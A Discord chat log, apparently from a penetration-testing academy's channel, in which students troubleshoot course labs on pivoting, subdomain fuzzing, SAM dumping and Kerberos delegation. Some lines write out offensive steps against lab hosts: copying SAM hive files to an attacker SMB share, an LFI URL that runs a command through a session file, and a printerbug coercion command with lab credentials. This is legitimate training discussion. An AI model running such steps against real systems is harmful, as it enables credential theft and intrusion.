#modules
maybe reaching out to support
As far as I know, there is currently no solution to the problem
or submitting to /feedback
cool will do, thanks
I am currently doing NTLM relay attacks. Does anyone know if it is possible to recreate the attacks through a pivot host? (executing responder and ntlmrelayx.py)
Hi everyone,
I'm doing the module "Pivoting, Tunneling, and Port Forwarding". When I try to scan the other host with proxychains nmap -v -Pn -sT 172.16.5.19, I receive these messages:
...
dig: parse of /etc/resolv.conf failed
...
I can't complete the scan and after a few seconds, I see that my CPU and memory usage goes up to more than half. If I try multiple times, the PC crashes.
Has anyone experienced this error? Best regards and thank you very much.
i did not experience this error but I'm curious about it. what does your /etc/resolv.conf look like?
Hey there lads, I just finished the Module **Fingerprinting** on Information Gathering - Web Edition
I've got the second question right but with the wrong procedure, I wonder if there would be an easier way to do it, but here's how I did it.
||Run nikto on app.inlanefreight.com after modifying hosts file, the output spits out a couple of entries related to robots.txt
Just out of curiosity I check it out with
curl app.inlanefreight.local/robots.txt
And I can see that the CMS is there, and it's a valid answer for the question ||
I feel that I should be able to grab the CMS through this command
curl -I app.inlanefreight.local
And check the X-Redirect-By value, but it's not being redirected at all, any other options?
thank you for your reply:
```
# Generated by NetworkManager
search fritz.box
nameserver 192.168.178.1
nameserver fd00::b2f2:8ff:fe6a:fad2
nameserver 2001:a61:a60:f301:b2f2:8ff:fe6a:fad2
```
the command is trying to resolve an ipv6 address, but why? did you add those entries in the resolv.conf file? is it something you use for another purpose?
mmm no... I've just removed all the lines and wrote nameserver 8.8.8.8 and now it works. But I guess this solution will bring me some other problems later. Maybe it has something to do with proxychains.conf:
```
dynamic_chain
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks4 127.0.0.1 9050
```
mine is:
```
strict_chain
proxy_dns
remote_dns_subnet 224
tcp_read_time_out 30000
tcp_connect_time_out 16000
[ProxyList]
socks4 127.0.0.1 9050
```
For the skills assessment of info gathering, is /opt/seclists/Discovery/DNS/subdomains-top1million-110000.txt sufficient to find the right VHOST?
did you try it?
^
and my resolv.conf got
nameserver 127.0.0.1
and my nat address
but no external resolver
maybe it is not a reference since I messed with bind to set up a local dns for my home lab
but basically it is my nat that resolves the ip i want to reach
yes doesn't work
can you explain what does not work? do you get errors, no results?
Ok it was the vpn which was crashing unfortunately, it works now
Section* Fingerprinting
i think we don't need a vpn to connect to that host
Thank you for the response! I don't know what might be happening. Sometimes it connects, and other times it times out. Nmap tells me that all ports are filtered, and with xfreerdp I can sometimes connect.
Is it a vanilla config or did you configure things for your specific use? it is hard to diagnose a config from here, i would run nmap with trace packets, wireshark... it should run pretty straightforward with proxychains, but you got ipv6 addresses in resolv.conf, something is happening there. Or maybe dynamic and strict at the same time, that is curious
Enumerate the web page of an enumerated subdomain of another subdomain... is it realistic?
did you try it? : )
yes, I'm currently fuzzing directories without success, my only remaining question is the current API key
I removed dynamic_chain, added remote_dns_subnet 224, increased the timeouts. In resolv.conf I added nameserver 127.0.0.1 and it worked 😕 , so there is no more conflict with ipv6. Anyway, thank you for helping!
that question?: What is the API key in the hidden admin directory that you have discovered on the target system?
Sorry for the questions, I have found the answer based on previous discord messages, there is so much guessing for this skills assessment
well at least you practice some osint skills : D
yeah ! This enumeration was a little bit guessy, some steps were obvious to do, some other...
the assessment brief tells all the steps to follow, maybe not totally in order... and the questions add another layer on what to search for. I do not know how to help if your only issue is you don't get the answers : )
Nikto didn't work so well for me in this case. I simply browsed the site and found specific keywords. Later i realized the whatweb tool works much better.
SQLMap Attack Tuning module
What's the practical way finding the custom prefix / suffix? I had 0 idea on how to find it for Case #6, looked up the hint and solved it. Now I'm wondering, what's the way to do this without looking at the hint? The solution doesn't provide this information.
anyone done with the last question on INFORMATION GATHERING - WEB EDITION - Skills Assessment
yeah
https://academy.hackthebox.com/module/136/section/1291
**Try to read the source code of 'upload.php' to identify the uploads directory, and use its name as the answer. (write it exactly as found in the source, without quotes)**
Managed to read flag.txt with XXE in svg.
Tried to use XSS in XML to read upload.php
Tried to use XXE to read /var/www/html/upload.php
I'm working on it now. Feel free to DM and discuss
Just a general question. When you use the 2&>1 after a command in Linux, what exactly are you doing? Redirecting stderr to stdout?
$ whatever 2&>1
Stderr AND stdout, you generally add a file after
For instance a program might just redirect stderr to a log file, while stdout to terminal (and/or file)
Gotchya, yeah I'm more or less familiar with how it's used, I just can never remember the syntax and I'm trying to break it down.
Like, for years I've switched where the & goes lol
Redirections (Bash Reference Manual)
Hello, if I subscribe to the annual billing, I can access the module. When the annual billing has expired, could I still access the module?
you maintain access to modules you've completed.
Thanks!
Hello I am on the Pivoting tunneling and port forwarding module and I am tunneling with Chisel and when I scp the binary over to the pivot host and try to run it I get this error. ./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)
I also tried another version of Chisel
You'll want to use an older version of chisel
I have tried
well, that's the solution
looking back at my notes, i had to use v 1.7.4. have you tried that far back?
I went through github and went to the releases, got the source code and unzipped it, then built it
I went as far as like 1.3
try 1.7.4
Good day mate👋
how much hahahah because I've spent almost 3h and nothing for a while
some hint friend???
what have u done
can I text you private?
yessir
So i am working through the new content in the Information Gathering - Web Edition module. I am on the Skills Assessment, on the final question. I have found a couple of subsequent subdomains, but I can't do anything with the last one I found. It's like it can't connect to it. I have added it to my host file, I've tried resetting the VPN and the machine. I've tried FinalRecon, ReconSpider, Gobuster, and other tools and am getting nowhere. Anyone finished it recently that might be able to help?
im doing the Pivoting/Forwarding/Tunneling module. finally a module that i can use my networking knowledge from the JNCIA training i did lol
i haven't gone back to that module yet.
Aside from this last question it has all been relatively straightforward. This one is a doozy though.
All for it not to matter
ohi just noticed, it changed my name in here since identifying in the welcome channel ... interesting
haha, for what part not to matter? the JNCIA stuff? or the module?
so far im a little surprised they havent explained subnetting a bit more, but i guess its not entirely needed. helps to understand networking architecture. i want to do the networking design course by Juniper. its on my list.
Intro to networking is the only module that covers subnetting
well ive found JNCIA to be helpful here and there. though it is juniper based, its far more applicable in general than CCNA imo
In terms of being an attacker, you don't really need to do subnetting, just be aware of them
As well as defense
it's good to know but you don't need in-depth knowledge
yea true. with the parts on why there is a jump host/pivot, makes perfect sense to me given the subnetting.
Just know you pivot because your host doesn't have access to the internal network
yea very true. i did my JNCIA as i thought it'd help me with moving towards purple teaming which is what i want, eventually.
Btw after this module, look into ligolo-ng, it makes all the pivoting simple
Even defensive side
You don't do a lot of networking in offense/defense
ive seen that name mentioned. will definitely take a look. i just got to the Socat stuff.
That's for the Network Admin to sort out and maintain
You just hook into the infra setup
yea true. i hope that it will serve me well when im producing real pentest reports, though. being able to identify weaknesses in infrastructure
You're not gonna be focused on the subnetting parts; maybe the subnets of a network to identify weaknesses
yea true
And generally you do it on a host by host basis not full network for the report
i have a use for the JNCIA in other areas anyway. it wasnt just for moving towards purple team
Though what CPTS asks for there's a sample report that you can go off of
i had a look at a dummy report from sysreptor but i havent looked at any others
have you done the CPTS yet, marcie?
ah. you seem all over it, i wouldnt have been surprised if you had lol
yea i get that. im trying to do as much of this as i can, as i know i have life stuff coming my way very soon that will also grind me to a halt
so u are unable to see the webpage?
CPTS has been harder than i thought. im wondering if i should've started with CBBH lol
The only one accessible is inlanefreight.htb and has the Welcome message and that is it.
They wouldn't necessarily help with one another
The only thing that binds them is the surface level web stuff
make sure your hosts file is set up correctly
That's it
Information Security Foundations is the pre-req for Pentester path though
well i had a look at 1 of the free retired machines, and its heavy on the web exploits. but i was wondering if cbbh wouldve been better also because it is a shorter track
I have it set up with <ip>:<port> <domain>. Am I missing something there?
well ive done some infosec stuff at work, and added to it with security+ as well. so the infosec req didnt worry me too much
yes, u do not add the port to hosts file
CBBH focuses on surface level exploitation, boxes are meant to be rooted
Okay, I'll try that way
and any other sub domains u found you also add it to the hosts file
Yeah, that part I know
yea. that is true. i also know a good chunk of CBBH is covered in CPTS
Not to mention what's on boxes may not be covered by the course content
I wouldn't say covered, its just module overlap
thats what i meant
I.e. you don't need to do a module again if you do both CPTS and CBBH
Looks like it was the port that was screwing everything up. Thanks!
The hosts file shouldn't have ports in it
It's why all the examples and such still specify port after domain http://inlanefreight.htb:port
Yeah, not sure what got me putting the port in because I usually don't
im trying to use rpivot. has anyone had any luck installing python2.7 on a parrot OS VM?
Use a venv (virtual environment)
for python2.7 i use pyenv to manage versions
do you have a link to how you got that done? that doesnt seem to work for me either
awesome. i went with pyenv. setting up 2.7 now
then, with some aliases, it becomes pretty neat
i followed along and added the paths to .bashrc and .profile
seems to work with just python2.7 command
If you edit the .bashrc file you'll need to do source .bashrc or reopen the terminal to get it to register
Hey guys I am working through "ATTACKING COMMON SERVICES - Attacking SQL Databases" module and I cant connect to mssql with:
mssqlclient.py -p 1433 htbdbuser@10.129.203.12
tried adding -windows-auth at the end too but nothing seems to be working. I get this error with TLS:
```
[*] Encryption required, switching to TLS
[-] [('SSL routines', '', 'no protocols available')]
```
Can anyone help with some hints please, been stuck on this for 2 days now?
ah, send the whole directory not just the file...
I am using HTB machine so it should be. Let me check the steps all over again
i like rpivot though thats a lot of stuff to send over to your pivot host. i'd assume it'd get noticed
cool though
Yeah it's not working for me
Seems some packages got broken
well that sucks
sudo pip install impacket --upgrade --break-system-packages
I'd not worry too much about getting noticed... i got into some evasion rabbit hole around the same time in pivoting...
i guess im thinking too far ahead for an engagement
for training it wouldnt matter
that fixed it! Thank you so muchhhhh! You saved me ❤️
it seems something must have broken when they updated the pwnbox images
Using the known subdomains for inlanefreight.com (www, ns1, ns2, ns3, blog, support, customer), find any missing subdomains by brute-forcing possible domain names. Provide your answer with the complete subdomain, e.g., www.inlanefreight.com.
Guys, I'm confused how to do this. I'm using dnsenum to find the missing subdomains but I'm confused whether I should create the wordlist myself or what should I do?
have you tried it?
you should use a premade wordlist
like the one in {path}/SecLists/Discovery/DNS/
or whatever is shown potentially by the section/module
That's exactly where I am. I've got the correct info in the hosts file (ie just the name and IP) but I can't find any vhosts or subdirectories with either gobuster or ffuf. I've tried the medium directories list and subdomains-top1million-110000.txt for the vhosts.
you could try the command in the section
i did that but not getting answer
then you're likely doing something wrong ™️
because inlanefreight.com is a live website, it's not the target
are you setting too many threads and it's just dropping all them, are you just being impatient
dnsenum --enum inlanefreight.com -f /usr/share/SecLists/Discovery/DNS/subdomains-top1million-20000.txt
am using this
is the section telling you to use dnsenum?
no am only using threads to enumerate vhost using gobuster
it also helps if you provide the module name and section name
yes
and not just the question
but they want answers
asking questions correctly helps avoid confusion ¯\_(ツ)_/¯
yeah you are right, i was just joking
but it seems you know the module he's on
the section contains all you need, just try the commands
i had to search but it is https://academy.hackthebox.com/module/144/section/1253
the walkthrough also shows using that same command
so
could you tell more on what's happening?
is your host files correct (ip then domain name)
not port
I can hit the server at the IP and port provided, retrieve what http server is running. The next question mentions a hidden admin directory so I've tried directory fuzzing but I just get the same welcome to inlanefreight.htb page
just ran it and found it just fine
if you're using the pwnbox the new file location is lowercased now; instead of SecLists it's seclists
i noticed because the error i got was "make sure file exists"
Same location on my Kali box
wasn't referring to you
just out of curiosity, the other day i tried without adding the subdomains to /etc/hosts and it works for that part, we can retrieve the subdomains
i was replying to the person regarding something else
it depends on the tool used
i also corrected the same thing with the command
ffuf doesn't matter because you throw the -H "" flag at it
still not getting
paste the command you are using. do you get any errors while fuzzing?
works with gobuster as well, but anyway we have to add the subdomains for later in the assessment so it is not a big deal
do inlanefreight.htb:port instead of IP
OK.
hey you will not get subdomains with that command
you are fuzzing for directories there
but also that's not how you get subdomains yeah
fuzzing for subdomains with ffuf would be -H "FUZZ.inlanefreight.htb" with the discovery/dns/ wordlists from SecLists
you'll have to check on subdomains
Yeah, I've tried for both subdomains and directories
Was what I used for subdomains
ffuf -u http://134.209.24.248 -H "Host: FUZZ.inlanefreight.com" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt
is this correct?
if you add the port it will be correct
^
you need the port dude otherwise it assumes 80
make sure to add the port
if one wordlist doesnt find anything try a different one
if you go back to the course material and try the different wordlist shown there, you'll find the subdomains
Hey! When I'm executing ReconSpider.py from the updated module (Web edition) I get this error, there is the output. Any one get the same error?
did u try http://inlanefreight.local
I tried with https://inlanefreight.local, http://inlanefreight.local, http://inlanefreight.com, 😦
yeah all of them
yes same here, it works nonetheless
and instructions says you need to crawl inlanefreight.com. So what?
well it still shows it ran so have u checked the results?
check the results of reconspider
ah i didnt see the end of your file, you got this error PermissionError: [Errno 13] Permission denied: 'results.json'
¯\_(ツ)_/¯
ok nvm ty
it should be run on inlanefreight.com
so it seems you are in a directory where reconspider cannot write
thanks all for help lol my fault haha
yeah the focus is different i guess
Def would have liked them to still show whatweb off again
also was wappalyzer also not showing the CMS for you on the fingerprinting section? I managed to get it from other means (whatweb/source/looking at page generation)
Comrades, good morning everyone, I have a problem in the password attacks module, specifically in Attacking SAM, the question is the following: "Apply the concepts taught in this section to obtain the password to the ITbackdoor user account on the target. Submit the clear-text password as the answer." I have the share and I have saved the files as indicated in the guide but when I move them it tells me the following: The system cannot find the file specified. The command to move them I have as follows: move sam.save \<ipattackerHost>\hashesHklm but I don't understand why it doesn't move the files to my machine
do you have an smb fileshare open?
also with xfreerdp you do have the /drive: option to mount a drive
yes sometimes wappalyzer doesnt show cms, if i remember correctly, sometimes it does tho
¯\_(ツ)_/¯
I knew how to find it out (it's a rehash of the previous version anyway)
@fathom pendant xfreerdp /u:Bob /v:10.129.149.175 /p:HTB_@cademy_stdnt!
you can add /drive:share,/tmp/ to mount the /tmp/ directory and you'll see it from the shares in file explorer
Here we go again 🙂
I also suggest doing /dynamic-resolution so you can resize the screen
also "cannot find the file specified" did you extract the sam.save to be able to move it?
i found that extension: owasp penetration testing kit. it shows quite a lot but it is a bit cluttered
i like my CLI tools ¯\_(ツ)_/¯
they haven't let me down yet
@I extracted it as indicated and he tells me that it has been done successfully
ok is it in the directory you're currently in to move it
yeah whatweb is just easy
but again my initial question wasn't answered
C:\Windows\system32>
do you have an smbserver running for windows to connect to and drop
I got it set up and running
that's what it's referring to with move file \\your_tun0\sharename\file
Wait I've gotten lost again
the \\<attacker_ip>\ is YOUR IP
on that, i think now the module focuses more on what useful for an htb environment than searching shodan, censys, and real dns records
i thought u had to do this first net use \\your_ip\sharename
you don't have to
move sam.save \<ipTarget>\hashesHklm
bruh ive been doing that the whole time T-T
you can just specify the remote target
not iptarget
tun0
YOUR tun0 ip
\\10.10.x.x\<whatever you named the share>\
your tun0 refers to the IP given when you do ip a on your attack host
I'm going to try again when it comes
Hello there,
I am doing linux fundamentals and i am at a point where i can't find the user's mail. I was able to discover the /var/mail and the /var/spool/mail directories but they didn't contain anything for the user and as such they were not passed. Any pointers...
check env
it's where it's defined
let me get on it. thanks
note: it can be defined in the environment but not exist on the filesystem
then it's just hidden with a . preceding its name..!
nope
if i meant hidden i would have said hidden
env gives all the environment variables; MAIL is one of those variables
also make sure you're ssh to the target
otherwise you're not gonna find the answers
yes, i have. Just trying to wrap my head around the environment variable. it must be saved somewhere on the system. I just have to find where
brother
i'm telling you the command that will print them out
the environment variable defines the file location for it
you don't have to dig through the filesystem for it
you're overcomplicating it
🙀shame on me. I'm back in. and i am looking at the path
VAR=/path/to/thing
An environmental variable in Linux is a way for your computer to store information it needs to work. Think of it as a note with important details, like where to find programs or files. For example, the PATH variable tells the computer where to look for commands you type. You can see or change these variables to control how things run.
thanks
inlanefreight.com NS record query failed: SERVFAIL
Guys am getting this error on Information Gathering - Web Edition -> subdomain bruteforcing
am using dnsenum --enum inlanefreight.com -f /usr/share/wordlists/seclists/Discovery/DNS/<every wordlists>
sure will do, will try again soon
yeah am aware of the dot issue 🙂
haha yup did do that
does it happen with every wordlist? I just tried with one and it works fine
Try explicitly specifying a DNS server?
which one did you use? i tried with every wordlist
there are 3 wordlists used in that page of the course material, they say let's use the 5000, then the code shows the 110000 and then another example is the 20000. I think you can figure it out from there. But that does not solve your servfail issue
how to solve servfail issue?
did you try what candy29 just proposed a few messages above?
do you think the servfail issue might be wordlist related?
just try to google the error
me too, and i don't know really why you get that error. Did you try to specify a dns server that dnsenum will use?
naah am using
dnsenum --enum inlanefreight.com -f <path to wordlists>
Oh
Try specifying one dnsenum --dnsserver 8.8.8.8 --enum inlanefreight.com -f <wordlist>
thanks, it did work, what about vhost now
how to solve this am using
gobuster vhost -u http://<ip>:port/ -w <path to wordlists> --append-domain
am not getting answer
am using seclists wordlist
what are you getting?
i am stuck at Web Attacks - Skills Assessment. now i know a user who may be an admin but i can't change the password for him. any hints?
I am having an issue on Password attacks hard skill assessment where I have the password NT hash of the Administrator from the vhd and it seems to be an empty string, also tried PtH with no success
you could try to see if there is any missing flag in your command using:
gobuster vhost --help
can i dm you?
yeah go on
Footprinting lab - Hard
When I look up help on this anywhere, the first thing I read is about how SNMP should be looked into, my question is, how should I come to the conclusion that SNMP is running at all? My nmap scan outputs this
your nmap scan is a tcp scan, but snmp runs on udp, so you need to perform a scan with the -sU flag
holy i forgot ty
ideally you always scan both, in 99% of the cases you only care for the tcp ports though. I keep forgetting udp scans most of the time too
did you find the issue?
I did not haha my internet started acting up
what do you mean by empty string?
When cracking the NT hash found in the vhd it is just an empty string
strange, should be a password. when i google "hashcat empty password", there are several things possible. Maybe mismatching the type? check the potfile, or output results to a file
I tried with crackstation and it also came back as empty
is your hash like e53...22a1
na its something like 31d...9c0
also all users I found in the vhd have the same hashes
you probably got the wrong hash then
that s guest hash
The guest and the admin are both the same for me for some reason
you must be damned
haha I'll look into it some more maybe some issue with me dumping them or mounting it!
Thank you though!
hey
- Which CMS is used on app.inlanefreight.local on the target system? Respond with the name only, e.g., WordPress.
- On which operating system is the dev.inlanefreight.local webserver running in the target system? Respond with the name only, e.g., Debian.
I'm having an issue with these questions from Information Gathering - Web Edition -> Fingerprinting
I used curl -I http://<ip> to find the cms, whatweb but didn't find the cms
and used nmap -O <ip> to enumerate the OS still not getting anything
did you add all the virtual hosts in the /etc/hosts file?
is the site down for any1 else?
Yeah its down
i had 1 section left before skills assessment. i wanted to get it done then go to bed, lol.
yes, here as well
The site is offline?
ok cool. good to know.
seems like that. for me also
ah now it is up again
they changed the default terminal from the parrot machines. nice..that green was always horrible for my eyes...
is there a way to send feedback for modules ?
Via /feedback I guess
like in the pivoting module, when we discover IP 172.16.5.129/23 the author mentions to do a ping sweep via metasploit using 172.16.5.0/23. However this is incorrect because the network address for the host is 172.16.4.0/23, not 172.16.5.0/23. This detail is pretty important imo, as with the instructions provided it could lead to missing discoverable hosts during a ping sweep.
Is the point of this to make students not bother with basic subnetting? big mistake if that is the case imo and should be clarified
Oh ok thx 🤝
I did that section today. I didn't have any problems with that tbh. But you're right about the subnetting. I mentioned it earlier today.
Personally I think NetworkChuck does some great explanations of subnetting
excellent good to know someone mentioned it, hopefully they fix it
Hi
I finished File Uploads: Whitelist Filters, but cant understand one thing.
In this module i can successfully upload the file extension shell.php/.jpg or shell.php..jpg. What must be written in the URI to get access to this file?
I tried different combinations http://x.x.x.x/…./shell.php, shell.php.jpg, shell.php/.jpg, but always get "Not Found"
I can't get HTB to accept an answer for the Using CrackMapExec -> Basic SMB Reconnaissance module / section. The question is What's the OS version, and this is the output from crackmapexec SMB 10.129.204.177 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:inlanefreight.htb) (signing:True) (SMBv1:False), I've tried every possible combo of that version with no success
Was doing 'DNS Tunneling with Dnscat2' in the Pivoting module.
Anyone else had issues with the connections "timing out" when connecting from the windows host back to the LOCAL DNS? Dunno if it's because I put dnscat2.ps1 in C:\ or something, I did manage to use it correctly as the module says but the connections didn't seem to last for very long if they were idle for more than like 30 seconds.
Anyone done advanced sqli skill assessment that I can message about the RCE?
Huh
is it me or is the target for the questions in "Windows File Transfer Methods" EXTREMELY unstable?
It's sluggish and freezes for a moment at times... more-or-less. Apparently more for you.
yeah it kinda unf--ks itself after a while..
Hi, where can i go to for hints for CTF HTB Try out.
nowhere
there are no hints for CTFs allowed
anyone did the citrix section in windows priv esc module. do i just click on the launch.ica file and it will automatically connect?
yes
You won’t find the answer in usn journal but in the mft
another hint i've seen floating around that one is, assume the Zone.Identifier is the same
they gave files to download and read the codes but its encrypted and im unsure whats the password to extract the files
i try that...should i open the mft in timeline explorer, read something about that in a reddit forum...
Sure, so that and look for zone identifiers and see if you notice anything
that's too bad, but there's no one that can help you with an active CTF
if you really want to keep asking post in #1024429874246590575
nah dont get it. can you help me a bit more specifically? which file do i have to open in timeline explorer?
this $MFT, converting it to a csv and reading it with timeline explorer, right?
I've read in a lot of forums, including Reddit, that many people have trouble with this question. It seems to be poorly explained
if anybody likes to help me, just dm me!
because i am off now
i just want to end the module that i can give a bad review really...
It's likely you're just overthinking it
1 star for sure
once you find it you'll feel dumb more than likely ¯\_(ツ)_/¯
You're already told to look for the Zone Identifier
In both usn journal and the Explorer. I'm assuming the section and module taught you how to look for that info
You should have a csv for both the journal and mft
i do have that
if you have the Zone.Identifier, you can locate the renamed file
Then search for "uninstall.exe"
the Zone.Identifier will stay the same across renames
In the nmap module it is mentioned that nmap normally uses ARP ping, but the most reliable method is ICMP echo ping and we have to use --disable-arp-ping to do the ICMP ping, but i tried this and my nmap normally uses ICMP ping. i am a little confused here, did i understand it wrong? please help
Nmap uses ICMP for host discovery, it's why you use -Pn to disable it when scanning targets that wouldn't respond
so what about the ARP ping the module mentions?
That's a backup method
how?
i dont know the method. are you able to help more?
hmm, thnx
if the Zone.Identifier stays the same across renames, then the renamed file and the original file will have the same Zone Id
and how can i search for it?
where can you find a log of changes made to files
timeline explorer
what artifact can you check for file changes
timeline explorer has a search feature, use that and you have your answer
uninstall.exe:zone.identifier
found it
searched for uninstall.exe
not zone identifier
i still dont get what zone identifier helps...
i just searched for uninstall.exe
Ok let's take a step back
Take a look at the journal for uninstall.exe, and look for the zone.identifier there
Then in the mft one look for that
You need to examine both
Your account number is not valid. Please update your account number.
where do i update this?
Message support ig
Disable adblock
No
so there is no way for me to fix this myself?
¯\_(ツ)_/¯
maybe its the card thats expired, i cant renew my student subscription
still a weird message to get
Support is the best place to resolve issues
for sure
Not the discord
dont know what you mean
In both files, search uninstall.exe
In one the filename field will be different even though the zone.identifier is the same
I am doing InfoSec fundamentals. I want to have skin in the game with Linux, what distro would be the best? I heard fedora is good? Just to get more hands-on working with Linux and getting used to Linux, what do you guys suggest?
I don't know what part of the output of this command (view-source:||http://94.237.53.113:41835/index.php?language=/var/lib/php/sessions/sess_pe5tsqscr937shm045cem83je1&cmd=pwd||) I'm supposed to submit as an answer to the first question for the following module section. I tried multiple attempts:
https://academy.hackthebox.com/module/23/section/252
"Use any of the techniques covered in this section to gain RCE, then submit the output of the following command: pwd "
I just made the CSV file out of the MFT file and searched for Zoneidentifier=3
and that's it. But I don't know... I thought at the beginning this hadn't worked...
Debian
Or Arch
Fedora is Redhat, not as common. Debian distros are more common like Kali or Parrot
anyway. thx
Don't do zoneidentifier=3
I am off
Just ctrl+f for uninstall.exe
Question about the "Kerberos Attacks - Unconstrained Delegation - Users" module. Working on the krbrelayx portion and curious how you're supposed to get the hash to use for the exercise? I've tried to just use "-p" to set a password and auth to it that way, but nothing seems to be working
┌──(testing㉿kali)-[~/tools/windows/krbrelayx]
└─$ python krbrelayx.py -p jasmine
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.129.205.35
[-] Could not find the correct encryption key! Ticket is encrypted with keytype 23, but keytype(s) were supplied
[*] SMBD: Received connection from 10.129.205.35
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.205.35
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
Getting the above error
Can anyone help me with the last two questions from the Information Gathering skills assessment?
┌──(a㉿kali)-[~/tools/windows/krbrelayx]
└─$ python3 printerbug.py inlanefreight.local/carole.rose:jasmine@dc01.inlanefreight.local roguecomputer.inlanefreight.local
[*] Impacket v0.11.0 - Copyright 2023 Fortra
[*] Attempting to trigger authentication via rprn RPC at dc01.inlanefreight.local
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Triggered RPC backconnect, this may or may not have worked
printerbug exploit
Don't you need to provide the user here too?
hello all,
AD attack and enum
ACL abuse primer question2
" Which ACE entry can be leveraged to perform a targeted Kerberoasting attack? "
does not accept my answer
What did you put?
I am extremely disappointed with one of the mods
Poor communication, and they just locked down my erratum ticket
Said to seek help here, which is not the case
If you have an issue with mods reach out to an admin
But if your question was related to an academy module, ask here
but I will ask my question here I guess
Module Name: WINDOWS ATTACKS & DEFENSE
Section Name: Credentials in Object Properties
Event 4771 does not get populated thus not able to answer the last question
It was closed because it's not a reproducible error
dacl -_-
yeah that is fine
Are you looking at the right server?
DACL isn't an ACE entry
but I need the event id 4771 to answer the questions
It's more Generic
Yes. But are you looking at the right server for the event
Hey the Windows Evasion module, I am trying to generate an IV using this command:
for ((i = 0; i < ${#hexRandom}; i+= 2)) do echo -n "0x${hexRandom:i:2},"; done | sed 's/.$//'; echo
but I keep getting this error:
zsh: unrecognized modifier `i'
looking on DC1
The event gets logged on the key server
Do I have to set 'i' as a variable?
Connect to DC1 as 'htb-student:HTB_@cademy_stdnt!' and look at the logs in Event Viewer. What is the TargetSid of the bonni user?
this is the question
In the for loop you need to call the variable with $
It's set in the loop generation, you're just not calling it
It's not like python where naming a variable makes it implicit wherever the variable is called
Bash/zsh requires a variable to be called with $
So in this case $i
I tried that and got this error: zsh: bad math expression: lvalue required
Also you cannot even RDP into a PKI server
just powershell in
Also the question specifically says DC1; that is why I am looking on DC1
So either I am trippin' or the question is wrong or this is actually an erratum issue
Did you attempt the bonnie login?
Carefully go through the material in the section and you will get the answer
don't rush through it
4771 is an auth failure
I have gone through it like 3 times
you really think I am rushing through it
Well it wasn't reproducible
XD
So message support ig
that is fine that is supposed to be the event id
Since others aren't able to reproduce the case where the event id isn't populating
4771 but it is not populated and he sent me a screenshot and covered the date
like I also have 4771s but they are from the old date
and are mostly DC2 related
So I don't know if his are from the newer date or older date
@autumn pilot ease this man's worries
Since he's convinced he's being psyoped regarding this
hint - keep it simple
I am not convinced, but like, why the poor communication? I don't get it. "Keep it simple" is not a hint; I have followed every single step of the instructions. Anyways
Erratum is a channel created to report issues within the content; the topic you raised in #1234357888114364508 is not an issue with the machine
Mods aren't staff and aren't obligated to give you any hints
alright anyways
Additionally, you can use the discord search feature to look for students that have had similar questions related to the exercise/section which you can use for your advantage
it is what it is
Currently you are accepting neither the feedback nor the hint to keep it simple, and that won't yield you anything to solve the exercise
When you get stuck with a question/exercise a rule of thumb is to ask an appropriate question on how to get yourself unstuck
The more one pushes oneself to develop a question and express what one has tried, the more likely one is to get unstuck and run through the exercise
looking for some help on the "Using Metasploit Framework" modules - on two different questions & machines msfconsole is failing to launch the exploit, nmap & ping scans fail to get any traffic back. I have respawned the machines several times & tried on various different days - am I missing something other than a technical glitch?
The problem is the same question was asked by others
and was also not helped with in a helpful way
Like, I am trying to get unstuck
I look in the Windows security logs
and nothing; I followed every step
Kinda hard to say... which sections? Most likely, if the problem persists even after respawns and a several-day interval, it should not be an infrastructure issue
module/39/section/415
Dear god, I need a map now
Module name is better than the endpoint uri
If you are not finding the event, then you are missing a step
Sorry, new to this
Okay, so I copied and pasted the script, I imported it as a module
Using the Metasploit Framework > Sessions & Jobs
I ran the function
it gave me the password
I RDP'd into the machine with bonni
and the password
what the heck man
I set all my options appropriately; I also can't even navigate to the webpage for the machine
S...4 is her password
I'm spawning the box...
Did you spell her username right? bonni not bonnie
yes bonni
¯\_(ツ)_/¯
I will send you a screenshot
Well it worked on my machine
I right clicked security, filter view entered in 4771 and boom there it was
After it fails, switch the user to htb-student and then log in?
idk what to tell you man ¯\_(ツ)_/¯
so now I go to the events
From here I see the webpage
Yeah, I just DL'd a new VPN pack, can't even connect now
This is the issue I'm having on multiple MSF modules
Did you close your old vpn connection?
did you manage to look at the webpage source code to know which exploit to use?
Well yeah
not when my VPN was working - page unreachable
Change vpn regions, reset the target, try again
first thing is to get your vpn working so you can connect to the box.
Trying the pwnbox now
Use FQDN instead of IP
That can go in vhosts
But it doesn't have an fqdn for this section
Just ip (10.129.x.x)
yep
Sorry y'all, I guess Elon is clogging all my traffic today; it's taking forever for a pwnbox to spawn
thanks obama
maybe also try to killall openvpn
No processes found; still getting hung up on the link remote. I think I'll just try again later
seems to be some issue with my connection
yeahhhh I give up
I just changed servers
did everything
and still nothing
Wasted way too much time on this; idk how y'all got it, but kudos to you
Signed in as Bob--> attempted to sign in as bonni on DC1 --> signed in with htb-student
EU 1
But still you can connect here so... maybe try UDP or TCP, change region
I did it on my own vm, but I'll spin up pwnbox just for you
Thank you; if it is the pwnbox issue I hope I don't crash out XD
I even reset the target so it's not just pulling from what I just did
thank you XD
Gonna have to call it skill issue buddy... UK pwnbox, Eu1 academy server, fresh instance
what am I doing wrong
You're specifying DC1 in the connection and not the IP correct?
I AM SUPPOSED TO BE SPECIFYING DC1?!
YES
I am specifying the IP of DC
You're literally told to authenticate to DC1
DC1 172.16.18.3
what is the difference tho
Brooother
The way that they're routed even though they resolve.
You're told DC1 use DC1 not the IP
Otherwise it might generate a different error
In short: when they tell you a hostname to use: use the hostname
Just for the thing to be DC1? Like bro, in the document it says the DC1 IP is 172.16.18.3
I am done
thank you, I appreciate it
